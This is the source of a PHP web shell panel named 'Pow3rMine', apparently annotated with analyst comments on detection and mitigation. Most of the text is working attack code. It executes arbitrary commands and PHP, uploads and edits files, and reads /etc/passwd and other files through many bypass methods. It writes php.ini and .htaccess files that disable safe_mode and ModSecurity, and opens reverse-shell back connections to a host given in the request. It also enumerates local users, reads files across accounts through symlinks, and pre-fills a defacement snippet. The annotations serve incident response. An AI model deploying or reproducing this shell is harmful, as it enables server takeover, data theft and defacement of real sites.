$time = date("y/m/d", filectime($file));
if(is_writable($file)){$isWritable = "Y";}else{$isWritable = "N";}
if(is_readable($file)){$isReadable = "Y";}else{$isReadable = "N";}
$result .= $perms." ".$size." ".$time." ".$owner."/".$group." ".$isReadable."/".$isWritable." ".$type." ".$file."
";
}
}
return $result;
}
// footer() writes its markup with echo and has no return statement, so this echo adds no output of its own.
echo footer();
  1138. ?>
<?php
// Second copy of the panel's configuration and request bootstrap (the paste
// contains the script twice). Everything in this block runs on every request,
// before the authentication block further down the page.

// Hard-coded panel credentials. Static values like these are useful for
// clustering samples, but see the authentication block: they are not what
// actually gates access.
$user = 'powermine';
$pass = 'spycorder';
$uselogin = 1;
$sh3llColor = "green";

# MySQL Info ---------
$DBhost = "localhost";
$DBuser = "root";
$DBpass = "root";
#---------------------
session_start();
// Suppresses all PHP error output and removes execution time limits; the
// ini_restore()/ini_set() calls attempt to lift safe_mode and open_basedir.
// A long-running PHP worker with no time limit that survives client disconnect
// (ignore_user_abort) is consistent with the back-connect features below.
error_reporting(0);
set_magic_quotes_runtime(0);
set_time_limit(0);
ignore_user_abort(TRUE);
ini_restore("safe_mode");
ini_restore("open_basedir");
ini_set('max_execution_time',0);
ini_set('output_buffering',0);
ini_set('safe_mode','Off');

// Set Current Directory
// The working directory is taken from the request (POST curDir) and remembered
// in the session; no restriction is applied to the path.
if(!$_POST && !$_SESSION['curDir']) {
$dir = getcwd();
$_SESSION['curDir'] = $dir;
} else if(empty($_POST['curDir'])) {
$dir = $_SESSION['curDir'];
} else {
$dir = filter($_POST['curDir']);
$_SESSION['curDir'] = $dir;
}
// Set Dir Mode
if($_GET['dir_mode']) {
$dir_mode = $_GET['dir_mode'];
$_SESSION['dir_mode'] = $dir_mode;
} else {
$dir_mode = $_SESSION['dir_mode'];
}

// Set Usable Command
// The execution primitive used by Exe() is chosen by the request; "exec" is the default.
if($_POST['exe_method']) {
$exec_method = $_POST['exe_method'];
} else {
$exec_method = "exec";
}
# Logout
// Logout only blanks the two cookies client-side and reloads; $_SERVER['PHP_SELF']
// is written into the script unescaped.
if($_POST['logout']) {
print '<script>document.cookie="user=;";document.cookie="pass=;";</script>';
print '<script>document.location = "'.$_SERVER['PHP_SELF'].'";</script>';
}
// OS detection is a heuristic on the directory string: a colon in second position means Windows.
if(strlen($dir)>1 && $dir[1]==":"){$os = "Windows";}else {$os = "Linux";}
// phpinfo() is emitted here, ahead of the login check, so full environment
// details are exposed to any visitor of the file, not only to its operator.
if($_GET['info']){phpinfo();}
$safeMode = SafeMode();
// NOTE(review): $SERVER_SOFTWARE is not assigned in the visible code; presumably
// relies on register_globals-style variables — confirm.
$server = substr($SERVER_SOFTWARE,0,120);
$daemon = "";
?>
  1197. <html>
  1198. <head>
  1199. <title>Pow3rMine</title>
  1200. <link rel="shortcut icon" href='https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcT7-pxiVlmAxaQgk783wl4ySiJ2yZWQL7NN-9_z4VIzvMNEOZdrjQ' />
  1201. <meta http-equiv=Content-Type content=text/html; charset=UTF-8>
  1202. <embed src="" type="application/x-shockwave-flash" wmode="transparent" width="1" height="1"></embed>
  1203. <?php echo CSS($sh3llColor); ?>
  1204.  
  1205. </head>
  1206. <body dir='ltr'>
<?php
# ---------------------------------------#
# Authentication #
#----------------------------------------#
// Analyst summary of this block: the login screen is cosmetic rather than a
// containment boundary.
//  - The session is recognised by two cookies: the user name in clear text and
//    an unsalted MD5 of the password. Both comparisons are loose (!=, ==).
//  - When the request carries any query-string parameters, $user and $pass are
//    overwritten from $_GET before the submitted form values are compared, so
//    the configured credentials above are not what the check enforces.
//  - The cookie is set by echoing the submitted user name into inline script
//    without escaping.
// For incident response this means a host serving this file should be treated
// as usable by any party that found it, not only by whoever uploaded it.
if ($uselogin ==1) {
if($_COOKIE["user"] != $user or $_COOKIE["pass"] != md5($pass)) {
if($_GET) {$user = $_GET['user'];$pass = $_GET['pass'];}
if($_POST['usrname']==$user && $_POST['passwrd']==$pass){
print'<script>document.cookie="user='.$_POST['usrname'].';";document.cookie="pass='.md5($_POST['passwrd']).';";</script>';
} else {
if($_POST['usrname']){
print'<script>alert("Nike ta mère ffddddpppp");</script>';
}
?>
<br><br>
<center><img src="https://encrypted-tbn3.gstatic.com/images?q=tbn:ANd9GcT7-pxiVlmAxaQgk783wl4ySiJ2yZWQL7NN-9_z4VIzvMNEOZdrjQ"><br />
<sy>Pow3rMine</sy>
</center><br />
<div align="center">
<form method="POST" name="login_form" onSubmit="if(this.usrname.value==''){return false;}">
<input dir="ltr" name="usrname" id="username" value="" type="text" size="30" onBlur="Blur('username','userName');" onClick="Clear('username','userName');"/><br>
<input dir="ltr" name="passwrd" id="password" value="" type="password" size="30" onFocus="Focus(2);" /><br>
<input type="submit" value=" Login " name="login" />
</form>
</div>
<?php
// Unauthenticated requests stop here after the login form and footer are printed.
footer();
exit;
}
}
}
?>
  1239. <table cellpadding='0' cellspacing='0' width='100%'>
  1240. <tr>
  1241. <td width='160'>
  1242. <center><form method="post"><input type="submit" value="Logout" name="logout" id="logout" /></form></center>
  1243. <a href="<?php echo $_SERVER['PHP_SELF']; ?>"><img border='0' src='http://www.vexilenetwork.fr/dvz.png' width='100%' height='100%'></a><br>
  1244. <center>PowerMine™
  1245. <p></p>
  1246. <select name="dir_mode" id="dir_mode" onchange="change_dir_mode();">
  1247. <option value="cmd" <?php if($dir_mode == "cmd") {echo "selected";} ?> >CMD</option>
  1248. <option value="php" <?php if($dir_mode == "php") {echo "selected";} ?>>PHP</option>
  1249. </select>
  1250. </center>
  1251. </td>
  1252. <td>
  1253. <form method="post">
  1254. <table width='100%' style="border:none; padding:2px;" >
  1255. <tr>
  1256. <td width='103'>System</td>
  1257. <td width="323"><?php echo $os; ?></td>
  1258. <td width="90">Apache Modules</td>
  1259. <td width="278"><select ><?php
  1260. if(function_exists("apache_get_modules")) {
  1261. foreach (apache_get_modules() as $module) {
  1262. echo "<option>".$module."</option>";
  1263. }
  1264. }else {
  1265. echo "<option>NONE</option>";
  1266. }
  1267. ?></select></td>
  1268. </tr>
  1269. <tr>
  1270. <td>uname </td>
  1271. <td><a href='http://www.google.com/search?q=<?php echo php_uname(); ?>' target='_blank'><u><?php echo php_uname(); ?></u></a></td>
  1272. <td>Curl</td>
  1273. <td><?php echo Curl(); ?></td>
  1274. </tr>
  1275. <tr>
  1276. <td>pwd</td>
  1277. <td><?php echo getcwd(); ?></td>
  1278. <td>Open Basedir</td>
  1279. <td><?php echo openBaseDir(); ?></td>
  1280. </tr>
  1281. <tr>
  1282. <td>whoami</td>
  1283. <td><?php echo get_current_user(); ?></td>
  1284. <td>Magic_Quotes</td>
  1285. <td><?php echo magicQouts(); ?></td>
  1286. </tr>
  1287. <tr>
  1288. <td>Server</td>
  1289. <td><?php echo $server; ?></td>
  1290. <td>Register Globals</td>
  1291. <td><?php echo RegisterGlobals(); ?></td>
  1292. </tr>
  1293. <tr>
  1294. <td>Server Name</td>
  1295. <td><?php echo $_SERVER['HTTP_HOST']; ?></td>
  1296. <td>Gzip</td>
  1297. <td><?php echo Gzip(); ?></td>
  1298. </tr>
  1299. <tr>
  1300. <td>Your IP</td>
  1301. <td><?php echo GetRealIP(); ?></td>
  1302. <td>Oracle</td>
  1303. <td><?php echo Oracle(); ?></td>
  1304. </tr>
  1305. <tr>
  1306. <td>Server IP</td>
  1307. <td><a href='http://bing.com/search?q=ip:<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>&go=&form=QBLH&filt=all' target='_blank'><u><?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?></u></a> [<a href="http://whois.webhosting.info/<?php echo gethostbyname($_SERVER["HTTP_HOST"]); ?>" target='_blank' />Reverse IP]</td>
  1308. <td>MSQL</td>
  1309. <td><?php echo MSQL(); ?></td>
  1310. </tr>
  1311. <tr>
  1312. <td>PHP Version</td>
  1313. <td><a href='javascript:openPHPInfo();'><u><?php echo phpversion(); ?></u></a></td>
  1314. <td>MySQL</td>
  1315. <td><?php echo MySQL2()." ".mysql_get_server_info(); ?></td>
  1316. </tr>
  1317. <tr>
  1318. <td>Safe Mode</td>
  1319. <td><?php echo $safeMode; ?></td>
  1320. <td>MySQLi</td>
  1321. <td><?php echo MysqlI(); ?></td>
  1322. </tr>
  1323. <tr>
  1324. <td>disable functions</td>
  1325. <td><select name="disableFunctions"><?php
  1326. $funArray = DisableFunctions();
  1327. $funArray = explode(",",$funArray);
  1328. sort($funArray);
  1329. foreach($funArray as $fun){echo "<option value='".$fun."'>".$fun."</option>";}
  1330. ?></select>
  1331. <input name="STOP_Execute" type="submit" id="STOP_Execute" value="Turn Off" />
  1332. </td>
  1333. <td>MsSQL</td>
  1334. <td><?php echo MsSQL(); ?></td>
  1335. </tr>
  1336. </table>
  1337. &nbsp; [<a href='http://www.md5decrypter.co.uk/' target='_blank'>MD5 Cracker</a>]
  1338. [<a href='http://www.md5decrypter.co.uk/sha1-decrypt.aspx' target='_blank'>SHA1 Cracker</a>]
  1339. [<a href='http://www.md5decrypter.co.uk/ntlm-decrypt.aspx' target='_blank'>NTLM Cracker</a>]
  1340.  
  1341. <input name="USERS_1" type="submit" id="USERS_1" value="Users [1]" />
  1342. <input name="USERS_2" type="submit" id="USERS_2" value="Users [2]" />
  1343. <input name="USERS_3" type="submit" id="USERS_3" value="Users [3]" />
  1344. <input name="USERS_4" type="submit" id="USERS_4" value="Users [4]" />
  1345. <input name="USERS_5" type="submit" id="USERS_5" value="Users [5]" />
  1346. <input type="submit" name="forbidden_bypass" id="forbidden_bypass" value="Forbidden" />
  1347. <input type="submit" name="find_755" id="find_755" value="Find 755" />
  1348. <br>
  1349. </form>
  1350. </table>
  1351.  
  1352. <form method="post">
  1353. <center>
  1354. <textarea cols="150" rows="20" name="result" >
<?php
// Main request dispatcher. Exactly one branch runs per request, chosen by which
// submit button / field name is present in $_POST; its output lands inside the
// surrounding <textarea>. Each branch is annotated with what it touches so the
// corresponding artefacts can be looked for on an affected host.
chdir($dir);
if($_POST['login'] || !$_POST){echo ScanDirs();}
// Command execution: the URL-decoded CMD_Line goes to Exe() with no validation.
else if($_POST['CMD_Execute']){if(empty($_POST['CMD_Line'])){echo scanDirs();}else {Exe(urldecode(filter($_POST['CMD_Line']))); }}
// PHP code evaluation through Evaluation(), which is defined elsewhere in the file.
else if($_POST['PHP_Execute']){$eval = Evaluation(urldecode(filter($_POST['PHP_Line'])));}
// File upload: each file is stored in the current directory under the name the
// client supplied, with no extension or path checks.
else if($_POST['UPLOAD_Execute']) {
for ($i = 0; $i < count($_FILES['uploadfile']['name']); $i++) {
if($_FILES['uploadfile']['name'][$i] != '') {
if(function_exists('copy')){$upload = copy($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
else{$upload = move_uploaded_file($_FILES['uploadfile']['tmp_name'][$i], $_FILES['uploadfile']['name'][$i]);}
if($upload) {echo "The File ".$_FILES['uploadfile']['name'][$i]." Uploaded Successfully !
"; }
else { echo "The File ".$_FILES['uploadfile']['name'][$i]." Can't Be Upload :( !
";}
}
}
}
// File edit / save: reads any path readable by the PHP process into the
// textarea, and writes the textarea back to FILE_NAME through GenerateFile().
else if($_POST['EDIT_Execute']){$content = htmlspecialchars(file_get_contents(filter($_POST['Edit_Line'])));echo $content;}
else if($_POST['SAVE_Execute']) {
$content = filter($_POST['result']);
if(empty($content)){$content = " ";}
if(GenerateFile($_POST['FILE_NAME'],$content)){echo "[+]Saved Success !! ";}else{echo "[-]Save Failed !";}
}
// File read with a selectable primitive. The long list of alternatives exists so
// that a read still succeeds when individual functions are disabled; several of
// the helpers named here are defined elsewhere in the file. For hardening, this
// shows that denying one or two read functions is not sufficient on its own.
else if($_POST['READ_Execute']) {
$path = urldecode(filter($_POST['READ_Line']));
$file = fopen($path,'r+');
if($_POST['READ_Type'] == "file"){echo htmlspecialchars(filter(FileF($path))); }
else if($_POST['READ_Type'] == "fgets"){while(($line = htmlspecialchars(filter(fgets($file)))) != false){echo $line;}}
else if($_POST['READ_Type'] == "fgetss"){while(($line = htmlspecialchars(filter(fgetss($file)))) != false){echo $line;}}
else if($_POST['READ_Type'] == "readfile"){echo htmlspecialchars(filter(readfile($path)));}
else if($_POST['READ_Type'] == "fread"){echo htmlspecialchars(filter(fread($file,filesize($path))));}
else if($_POST['READ_Type'] == "file_get_contents"){echo htmlspecialchars(filter(file_get_contents($path)));}
else if($_POST['READ_Type'] == "tempnam"){echo htmlspecialchars(filter(TempnameF($path)));}
else if($_POST['READ_Type'] == "copy"){echo htmlspecialchars(filter(CopyF($path)));}
else if($_POST['READ_Type'] == "mb_send_mail"){echo htmlspecialchars(filter(mbSendEmail($path)));}
else if($_POST['READ_Type'] == "highlight_file"){echo htmlspecialchars(filter(highlightFile($path)));}
else if($_POST['READ_Type'] == "curl"){echo htmlspecialchars(filter(CurlFileRead($path)));}
else if($_POST['READ_Type'] == "imap"){echo htmlspecialchars(filter(ImapF($path)));}
else if($_POST['READ_Type'] == "id"){echo htmlspecialchars(filter(ReadId($path)));}
else if($_POST['READ_Type'] == "show_source"){echo htmlspecialchars(filter(show_source($path)));}
else if($_POST['READ_Type'] == "mysql"){echo htmlspecialchars(filter(MySQLReader($path)));}
else if($_POST['READ_Type'] == "mysqli"){echo htmlspecialchars(filter(MySQLIReader($path)));}
else if($_POST['READ_Type'] == "symlink"){echo htmlspecialchars(filter(SymlinkF($path)));}
else if($_POST['READ_Type'] == "ioncube"){echo htmlspecialchars(filter(ioncube_read_file($path)));}
else if($_POST['READ_Type'] == "error_log"){echo htmlspecialchars(filter(ErrorLog($path)));}
else if($_POST['READ_Type'] == "include"){echo htmlspecialchars(filter(IncludeReader($path)));}
}
// "Turn Off" button: drops a php.ini and an .htaccess into the current directory
// that try to switch off safe_mode, disable_functions, open_basedir and
// ModSecurity filtering, and point PHPRC at the dropped php.ini.
// Detection: an unexpected php.ini or .htaccess containing these directives in a
// web-served directory. Mitigation: these overrides only take effect where the
// server honours per-directory configuration, so restricting AllowOverride and
// per-directory PHP ini files at the server level neutralises this branch.
else if($_POST['STOP_Execute']) {
$genTry = GenerateFile("php.ini","
safe_mode = Off
disable_functions = NONE
safe_mode_gid = OFF
open_basedir = OFF");
if($genTry){echo "[+] php.ini Has Been Generated Successfully
";}
else {echo "[-] Failed to generate php.ini file !!
";}

$genTry = GenerateFile(".htaccess","
<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
SecFilterCheckURLEncoding Off
SecFilterCheckCookieFormat Off
SecFilterCheckUnicodeEncoding Off
SecFilterNormalizeCookies Off
</IfModule>
<Limit GET POST>
order deny,allow
deny from all
allow from all
</Limit>
<Limit PUT DELETE>
order deny,allow
deny from all
</Limit>
SetEnv PHPRC ".getcwd()."/php.ini
");
if($genTry){echo "[+] .htaccess Has Been Generated Successfully
";}
else {echo "[-] Failed to generate .htaccess file !!
";}
}
// Back-connect, raw-socket variant: opens an outbound TCP connection to the
// address and port given in the request and feeds whatever it receives to
// shell_exec(), writing the output back. The fixed banner string below is
// sent first and is usable as a network signature.
// Detection and containment: outbound connections initiated by the web server
// account to arbitrary hosts; default-deny egress filtering for web workers
// blocks both back-connect branches.
else if($_POST['CON_Type'] == "socks") {
$sock = socket_create(AF_INET, SOCK_STREAM, SOL_TCP);
if($sock < 0){echo "[-] failed to create socket.";}
else {
$result = socket_connect($sock, filter(trim($_POST['ip'])), filter(trim($_POST['port'])));
if($result < 0){echo "[-] failed to connect back to host:".$_GET['host'];}
else {
$send_var = "\n\n -== PowerMine , Back Connection ==-\n$";
socket_write($sock, $send_var, strlen($send_var));
while($input = socket_read($sock, 10000)) {
socket_write($sock, shell_exec($input), 12000);
}
}
}
// Back-connect, fsockopen variant. It sends a different fixed banner (presumably
// inherited from the kit this panel was derived from) followed by the output
// of uname, pwd and id.
} else if($_POST['CON_Type'] == "fsockopen") {
$ip = filter(trim($_POST['ip']));
$port = filter(trim($_POST['port']));
if (!empty($ip)) {
$con_fsockopen = fsockopen($ip , $port , $errno, $errstr );
if (!$con_fsockopen){
$result = "Error: didnt connect !!!";
} else {
$newLine="\n";
fputs ($con_fsockopen ,"\n\n -== SyRiAn Electronic Army , Back Connection ==-\n$");
fputs($con_fsockopen , system("uname -a") .$newLine );
fputs($con_fsockopen , system("pwd") .$newLine );
fputs($con_fsockopen , system("id") .$newLine.$newLine );
while(!feof($con_fsockopen)){
fputs ($con_fsockopen);
$one="[$";
$two="]";
$result= fgets ($con_fsockopen, 8192);
$message = $result;
fputs ($con_fsockopen, $one. system("whoami") .$two. " " .$message."\n");
}
fclose ($con_fsockopen);
}
}
}
// Local account enumeration through the GetUsers1..5 helpers (defined elsewhere in the file).
else if($_POST['USERS_1']){echo GetUsers1();}
else if($_POST['USERS_2']) {
$array = GetUsers2();
foreach($array as $line)
{echo $line."
";}
}
else if($_POST['USERS_3']) {
$array = GetUsers3();
foreach($array as $line)
{echo $line."
";}
}
else if($_POST['USERS_4']) {
$array = GetUsers4();
foreach($array as $line)
{echo $line."
";}
} else if($_POST['USERS_5']){echo GetUsers5();}
// "Forbidden" button: creates a "forbidden" sub-directory whose .htaccess forces
// every file, including .php, to be served as text/plain and uses sea.txt as the
// directory index. Combined with a symlink, this serves other files on the host
// as plain text.
// Detection: a directory named "forbidden" holding this .htaccess and a sea.txt
// symlink. Mitigation on shared hosting: do not let Apache follow symlinks
// across owners (SymLinksIfOwnerMatch instead of FollowSymLinks) and restrict
// AllowOverride so Options, AddType and handlers cannot be set per directory.
else if($_POST['forbidden_bypass']) {
mkdir("forbidden");
chdir("forbidden");
$forbidden_htaccess = GenerateFile(".htaccess", "
DirectoryIndex sea.txt
HeaderName sea.txt
ReadmeName sea.txt
footerName sea.txt
ErrorDocument 404 /404.html
404.html = Symlinked sea.txt
Options all
ForceType text/plain
AddType text/plain .php
AddType text/plain .html
AddHandler server-parsed .php
AddHandler txt .php
");
if($forbidden_htaccess) {
echo "[+] make your symlink as sea.txt in /forbidden/ folder and find the url /forbidden/sea.txt or /forbidden/";
} else {
echo "[-] error with generating .htaccess file.";
}
// "Find 755" button: lists other accounts' public_html directories whose mode is
// drwxr-xr-x, i.e. readable by this account on a shared host.
} else if($_POST['find_755']) {
Exe("ls -dl /home/*/public_html/ | grep drwxr-xr-x");
}
?></textarea>
  1522. <?php
  1523. if($_POST['EDIT_Execute']){echo "<input type='submit' value='Save' name='SAVE_Execute' class='Save' />
  1524. <input type='hidden' name='FILE_NAME' value='".$_POST['Edit_Line']."' />
  1525. ";}
  1526. ?>
  1527. </center></form>
  1528. <table width='100%'>
  1529. <tr valign="top">
  1530. <td width='30%'>
  1531. <!-- Edit File form (labelled "Command Line" in the original, apparently a copy-paste leftover): posts EDIT_Execute together with the path typed into Edit_Line. -->
  1532. <form method='POST' enctype="multipart/form-data">
  1533. <table height='72' border='0' id='Box' width="100%">
  1534. <tr>
  1535. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  1536. <td style="background-color:#666;padding-left:10px;">Edit File
  1537. <input name="EDIT_Execute" type="submit" id="EDIT_Execute" value="Edit" /></td>
  1538. </tr>
  1539. <tr>
  1540. <td height="45" colspan="2"><input type='text' name='Edit_Line' id='Edit_Line' value='<?php if($_POST['EDIT_Execute']){echo filter($_POST['Edit_Line']);}else {echo $dir;} ?>' size="70"></td>
  1541. </tr>
  1542. </table>
  1543. </form>
  1544. <!-- End of Edit File form -->
  1545.  
  1546. </td>
  1547. <td width='30%' height='30'>
  1548. <!-- Command Line form: posts CMD_Execute with CMD_Line, curDir, the exe_method select printed by print_exe_method() and the alias select printed by SelectCommand(). The submit button's onClick URL-encodes CMD_Line in the browser, so the command arrives percent-encoded in the POST body; request inspection rules need to decode it before matching. -->
  1549. <form method='POST' enctype="multipart/form-data">
  1550. <table height='72' border='0' id='Box'>
  1551. <tr>
  1552. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  1553. <td style="background-color:#666;padding-left:10px;">Command Line
  1554. <?php echo print_exe_method(); ?>
  1555. <input name="CMD_Execute" type="submit" id="CMD_Execute" value="Execute" onClick="document.getElementById('CMD_Line').value = encodeURIComponent(document.getElementById('CMD_Line').value);">
  1556. </td>
  1557. </tr>
  1558. <tr>
  1559. <td height="45" colspan="2">
  1560. <?php echo SelectCommand($os); ?>
  1561. <input type='text' name='CMD_Line' id='CMD_Line' value='' size="70">
  1562. <input name="curDir" type="text" id="curDir" value="<?php if($_POST['Execute']){echo $_POST['curDir'];} else {echo getcwd();} ?>" size="70"></td>
  1563. </tr>
  1564. </table>
  1565. </form>
  1566. <!-- End of Command Line form -->
  1567. </td>
  1568. <td width='30%' height='30' valign="top">
  1569. <!-- Upload Files form (labelled "Commands Alias" in the original): posts UPLOAD_Execute with one or more multipart uploadfile[] parts; the "+" button calls addUploadInput() to append further file inputs. -->
  1570. <form method='POST' enctype="multipart/form-data">
  1571. <table width='100%' height='72' border='0' id='Box'>
  1572. <tr>
  1573. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  1574. <td style="background-color:#666;padding-left:10px;">Upload Files <span style="padding-left:10px;">
  1575. <input type='button' value='+' id='addUpload' size='5' onclick='addUploadInput();'>
  1576. <input name='UPLOAD_Execute' type='submit' id="UPLOAD_Execute" value='Upload Files'>
  1577. </span></td>
  1578. </tr>
  1579. <tr>
  1580. <td height="45" colspan="2">
  1581. <input type='file' name='uploadfile[]'>
  1582. <input type='file' name='uploadfile[]'><div id='uploadInput'></div></td>
  1583. </tr>
  1584. </table>
  1585. </form>
  1586. <!-- End of Upload Files form -->
  1587. </td>
  1588. </tr>
  1589. <tr valign="top">
  1590. <td width='30%'>
  1591. <!-- PHP Eval form (labelled "Commands Alias" in the original): posts PHP_Execute with PHP_Line, which the onClick handler URL-encodes in the browser. The textarea is pre-filled with a sample that overwrites index.php with the word "Hacked", so an unexpected change to a site's index file is one visible symptom of this panel being used. -->
  1592. <form method='POST' enctype="multipart/form-data">
  1593. <table width='100%' height='72' border='0' id='Box'>
  1594. <tr>
  1595. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  1596. <td style="background-color:#666;padding-left:10px;">PHP Eval
  1597. <input name="PHP_Execute" type="submit" id="PHP_Execute" onClick="document.getElementById('PHP_Line').value = encodeURIComponent(document.getElementById('PHP_Line').value);" value="Evaluate"></td>
  1598. </tr>
  1599. <tr>
  1600. <td height="45" colspan="2"><label for="PHP_Line"></label>
  1601. <textarea name="PHP_Line" id="PHP_Line" cols="50" rows="2"><?php if($_POST['PHP_Execute']){echo urldecode(filter($_POST['PHP_Line']));}else {echo '$file = fopen("index.php","w+");
  1602. fwrite($file,"Hacked");
  1603. fclose($file);';}
  1604. ?>
  1605. </textarea>
  1606. <br></td>
  1607. </tr>
  1608. </table>
  1609. </form>
  1610. <!-- End of PHP Eval form -->
  1611. </td>
  1612. <td width='30%' height='30'>
  1613. <!-- Read Files form (labelled "Commands Alias" in the original): posts READ_Execute with READ_Line (a path, URL-encoded in the browser by the onClick handler) and READ_Type, which names the read primitive to try. The option values below are the literal strings a request inspector would see in READ_Type. -->
  1614. <form method='POST' enctype="multipart/form-data">
  1615. <table width='100%' height='72' border='0' id='Box'>
  1616. <tr>
  1617. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  1618. <td style="background-color:#666;padding-left:10px;">Read Files
  1619.  
  1620. <select name="READ_Type" >
  1621. <option value="file" >file</option>
  1622. <option value="fgets" >fgets</option>
  1623. <option value="fgetss" >fgetss</option>
  1624. <option value="readfile" >readfile</option>
  1625. <option value="fread" >fread</option>
  1626. <option value="show_source" >show_source</option>
  1627. <option value="file_get_contents" >file_get_contents</option>
  1628. <option value="tempnam" >tempnam</option>
  1629. <option value="copy" >copy</option>
  1630. <option value="symlink" >Symlink</option>
  1631. <option value="mb_send_mail" >mb_send_mail</option>
  1632. <option value="highlight_file" >highlight_file</option>
  1633. <option value="curl" >Curl</option>
  1634. <option value="imap" >Imap</option>
  1635. <option value="mysql" >MySQL</option>
  1636. <option value="mysqli" >MySQLI</option>
  1637. <option value="ioncube">Ion Cube</option>
  1638. <option value="error_log">Error_Log</option>
  1639. <option value="include">Include</option>
  1640. <option value="id" >ID /etc/passwd</option>
  1641. </select>
  1642. <input name="READ_Execute" type="submit" id="READ_Execute" onClick="document.getElementById('READ_Line').value = encodeURIComponent(document.getElementById('READ_Line').value);" value="Read"></td>
  1643. </tr>
  1644. <tr>
  1645. <td height="45" colspan="2"><input type='text' name='READ_Line' id='READ_Line' value='<?php if($_POST['READ_Execute']){echo urldecode(filter($_POST['READ_Line']));}else {echo $dir;} ?>' size="70"></td>
  1646. </tr>
  1647. </table>
  1648. </form>
  1649. <!-- End of Read Files form -->
  1650. </td>
  1651. <td width='30%' height='30' valign="top">
  1652. <!-- Back Connection form (labelled "Commands Alias" in the original): posts CON_Execute with ip, port and CON_Type (socks or fsockopen). ip defaults to the address returned by GetRealIP() and port to 443. For defenders the resulting indicator is an outbound connection opened by the web server / PHP worker process itself; default-deny egress from web hosts blocks it. -->
  1653. <form method='POST' enctype="multipart/form-data">
  1654. <table width='100%' height='72' border='0' id='Box'>
  1655. <tr>
  1656. <td width="4%" height="21" style="background-color:<?php echo $sh3llColor; ?>">&nbsp;</td>
  1657. <td style="background-color:#666;padding-left:10px;">Back Connection
  1658. <input name='CON_Execute' type='submit' id="CON_Execute" value='Connect'></td>
  1659. </tr>
  1660. <tr>
  1661. <td height="45" colspan="2"><input type="text" name="ip" value="<?php if($_POST['CON_Execute']){echo $_POST['ip']; }else {echo GetRealIP(); } ?>" />
  1662. <input type="text" name="port" value="<?php if($_POST['CON_Execute']){echo $_POST['port']; }else {echo "443"; } ?>" />
  1663. <select name="CON_Type" >
  1664. <option value="socks">SOCKS</option>
  1665. <option value="fsockopen">FSOCKOPEN</option>
  1666. </select>
  1667. </td>
  1668. </tr>
  1669. </table>
  1670. </form>
  1671. <!-- End of Back Connection form -->
  1672. </td>
  1673. </tr>
  1674. </table>
  1675. <?php
  1676. function IncludeReader($path) {
        // Reads a file by include()-ing it: splits $path at the last path separator,
        // points the include_path ini setting at the directory part and includes the bare file name.
        // Review note: include() executes any PHP code in the target rather than just printing it,
        // and the ini_set() change to include_path persists for the rest of the request.
        // Returns nothing.
  1677. global $os;
  1678. if($os == "Windows"){$slash = "\\";}else{$slash = "/";}
  1679. $fileName = substr(strrchr($path,$slash),1);
  1680. $includePath = substr($path,0,strpos($path,$fileName,0));
  1681. ini_set("include_path",$includePath);
  1682. include($fileName);
  1683. }
  1684. function GetUsers1() {
        // Account enumeration, variant 1: lists /var/mail through Exe().
        // Exe() in this file echoes its output and has no return statement,
        // so the value returned here is presumably null and the listing is printed as a side effect.
  1685. return Exe('ls /var/mail');
  1686. }
  1687. function GetUsers2() {
        // Account enumeration, variant 2: reads /etc/passwd with file() and returns
        // an array holding the first colon-separated field (the login name) of every line.
  1688. $array = array();
  1689. $lines = file("/etc/passwd");
  1690. foreach($lines as $nr=>$val) {
  1691. $str = explode(":",$val);
  1692. array_push($array,$str[0]);
  1693. }
  1694. return $array;
  1695. }
  1696. function GetUsers3() {
        // Account enumeration, variant 3: returns every directory entry of /home/
        // (including "." and ".."). Falls through without a return value when opendir() fails.
        // Hardening note: an open_basedir restriction that excludes /home makes opendir() fail here.
  1697. $array = array();
  1698. if ($dh = opendir("/home/")) {
  1699. while (($file = readdir($dh)) !== false) {
  1700. array_push($array,$file);
  1701. }
  1702. closedir($dh);
  1703. return $array;
  1704. }
  1705. }
  1706. function GetUsers4() {
        // Account enumeration, variant 4: nested opendir()/readdir() loops starting at /home/
        // that collect the entry names seen at the third level into an array.
        // At each level the first readdir() result is read and discarded before the loop starts.
        // Only the outer handle is closed; $dh2 and $dh3 are left open.
        // Falls through without a return value when the outer opendir() fails.
  1707. $dir = "/home/";
  1708. $array = array();
  1709. if ($dh = opendir($dir)) {
  1710. $f = readdir($dh);
  1711. while (($f = readdir($dh)) !== false) {
  1712. $dh2=opendir($dir."/");
  1713. $f2 = readdir($dh2);
  1714. while (($f2 = readdir($dh2)) !== false) {
  1715. $f2.="/";
  1716. $dh3=opendir($dir.$f.$f2);
  1717. $f3 = readdir($dh3);
  1718. while (($f3 = readdir($dh3)) !== false) {
  1719. array_push($array,$f3);
  1720. }
  1721. }
  1722. }
  1723. closedir($dh);
  1724. return $array;
  1725. }
  1726. }
  1727. function GetUsers5(){
        // Returns the canonical path string for /etc/passwd (or false if it cannot be resolved).
        // Despite the name, this returns a path, not file contents or user names.
  1728. return realpath('/etc/passwd');
  1729. }
  1730. function ErrorLog($path){
        // Reads $path indirectly: error_log() with message type 3 appends the file's contents
        // to a temporary file named by uniqid() in the current directory, which is then read back and deleted.
        // Returns the contents.
        // Forensic note: leaves a short-lived, uniqid()-named file next to the script.
        // get_magic_quotes_gpc() was removed in PHP 8.0, so this code path only runs on older runtimes.
  1731. $tempFile = uniqid();
  1732. if(get_magic_quotes_gpc() != 0){$path = addslashes($path);}
  1733. error_log(file_get_contents($path), 3, $tempFile);
  1734. $content = file_get_contents($tempFile);
  1735. unlink($tempFile);
  1736. return $content;
  1737. }
  1738. function SymlinkF($path) {
        // Reads $path through a temporary symbolic link: creates a uniqid()-named link to $path
        // in the current directory, reads it with file_get_contents(), removes the link and returns the contents.
        // Falls through without a return value when symlink() is not available.
        // Hardening note: listing symlink in disable_functions, or Apache's SymLinksIfOwnerMatch option
        // on shared hosts, limits this kind of cross-account read.
  1739. $tempFile = uniqid();
  1740. if(function_exists('symlink')) {
  1741. symlink($path,$tempFile);
